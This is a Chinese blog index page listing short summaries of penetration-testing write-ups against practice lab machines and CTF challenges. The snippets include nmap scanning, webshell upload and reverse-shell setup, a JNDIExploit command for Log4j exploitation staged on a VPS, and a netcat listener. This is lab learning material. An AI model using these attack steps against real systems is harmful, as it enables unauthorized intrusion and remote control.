会员
周边
新闻
博问
闪存
众包
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
黑夜的黎明
水面之下,面具之后
博客园
首页
新随笔
联系
订阅
管理
上一页
1
2
3
4
2024年6月5日
chill_hack
摘要: 靶机搭建 下载靶机配置ip与攻击机在同一网段即可 web渗透 主机发现ip扫描 nmap -sP 192.168.11.0/24 端口服务探测 nmap -A -p 1-65535 192.168.11.8 发现有http服务及公用的ftp共享 ftp连接 ftp anonymous@192.168
阅读全文
posted @ 2024-06-05 00:21 vзn0m
阅读(24)
评论(0)
推荐(0)
2024年6月3日
红日靶场2
摘要: 环境搭建 配置ip,web机有两张网卡,我对nat设置为192.168.11.0网段,仅主机为192.168.52.0网段,这三台机子都要改一下ip,官方给出要恢复快照3,恢复的时候有问题,不用恢复没有影响 web机的网络情况如下就可以了 在这个目录下启动weblogic服务,以管理员身份运行sta
阅读全文
posted @ 2024-06-03 22:44 vзn0m
阅读(84)
评论(0)
推荐(0)
2024年6月2日
红日靶场1
摘要: 环境搭建 对web机添加两张网卡 一张nat(web机默认为内网网段),另一张桥接为出网网卡 也可nat+仅主机但是网络环境问题多 这样环境就搭好了 重启修改密码,启动phpstudy web渗透 扫描ip nmap -sP 192.168.1.0/24 得到192.168.1.9等,7为kali机
阅读全文
posted @ 2024-06-02 17:08 vзn0m
阅读(37)
评论(0)
推荐(0)
2024年4月16日
matrix-breakout-2-morpheus
摘要: 虚拟机配置 将靶机和攻击机放在同一网段下即可 web渗透 ip扫描 nmap -sP 192.168.11.0/24 得到ip ip:192.168.11.6 详细扫描 nmap -A 192.168.11.6 -p 0-65535 得到22,80,81端口 探测web,81端口是一个登录弹窗 目录
阅读全文
posted @ 2024-04-16 23:48 vзn0m
阅读(33)
评论(0)
推荐(0)
breakout
摘要: 虚拟机配置 将靶机和攻击机放在同一网段下即可 web渗透 扫描ip nmap -sP 192.168.11.0/24 详细扫描 nmap -A 192.168.11.102 -p 0-65535 探测80端口 右键查看源码,得到一个brainfuck编码 解码得到.2uqPEfj3D<P'a-3猜测
阅读全文
posted @ 2024-04-16 23:31 vзn0m
阅读(23)
评论(0)
推荐(0)
2024年4月14日
jangow01
摘要: 虚拟机配置 将攻击机和靶机放在同一网段下即可 web渗透 IP扫描 nmap -sP 192.168.11.0/24 详细扫描 nmap -A 192.168.11.42 探测web网站 发现一可执行命令的地方, 写入一句话木马,用蚁剑链接 链接成功 用蚁剑写文件,反弹链接,注意只有443端口出网
阅读全文
posted @ 2024-04-14 23:23 vзn0m
阅读(8)
评论(0)
推荐(0)
2024年4月12日
web-wp
摘要: Log4j复现 进入题目 在vps上启动一个简易的ldap服务,用JNDIExploit脚本 vps启动服务 java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vpsip -l 1389 -p 8180 在开一个会话监听端口 nc -lvvp 4567 构造脚本注入
阅读全文
posted @ 2024-04-12 01:58 vзn0m
阅读(20)
评论(0)
推荐(0)
2024年4月10日
gaara
摘要: 虚拟机配置 将靶机与kali攻击机放在同一网段如nat下即可 web渗透 扫描ip nmap -sP 192.168.11.0/24 得到ip:192.168.11.93 详细扫描 nmap -A 192.168.11.93 -p 0-65535 有22和80端口 对http进行测试 就是一张图片
阅读全文
posted @ 2024-04-10 22:37 vзn0m
阅读(28)
评论(0)
推荐(0)
who-wants-to-be-king 1
摘要: 配置虚拟机 首先进行配置网络适配器,将靶机和kali攻击机放在nat下即可 web渗透 ip扫描 nmap -sP 192.168.11.0/24 得到目标机ip 详细扫描 nmap -A 192.168.11.5 -p 0-65535 得到22,80端口 访问80端口 下载文件,记事本打开,发现一
阅读全文
posted @ 2024-04-10 01:24 vзn0m
阅读(20)
评论(0)
推荐(0)
命令执行
摘要: web29 直接执行命令 得到flag web30 发现过滤了system,用passthru代替 得到flag web31 发现过滤了一些函数,passthru用不了了 直接使用highlight_file读文件 得到flag web32 进入题目 发现过滤了分号,(等用不了一些函数,但可以用in
阅读全文
posted @ 2024-04-10 00:45 vзn0m
阅读(11)
评论(0)
推荐(0)
上一页
1
2
3
4
公告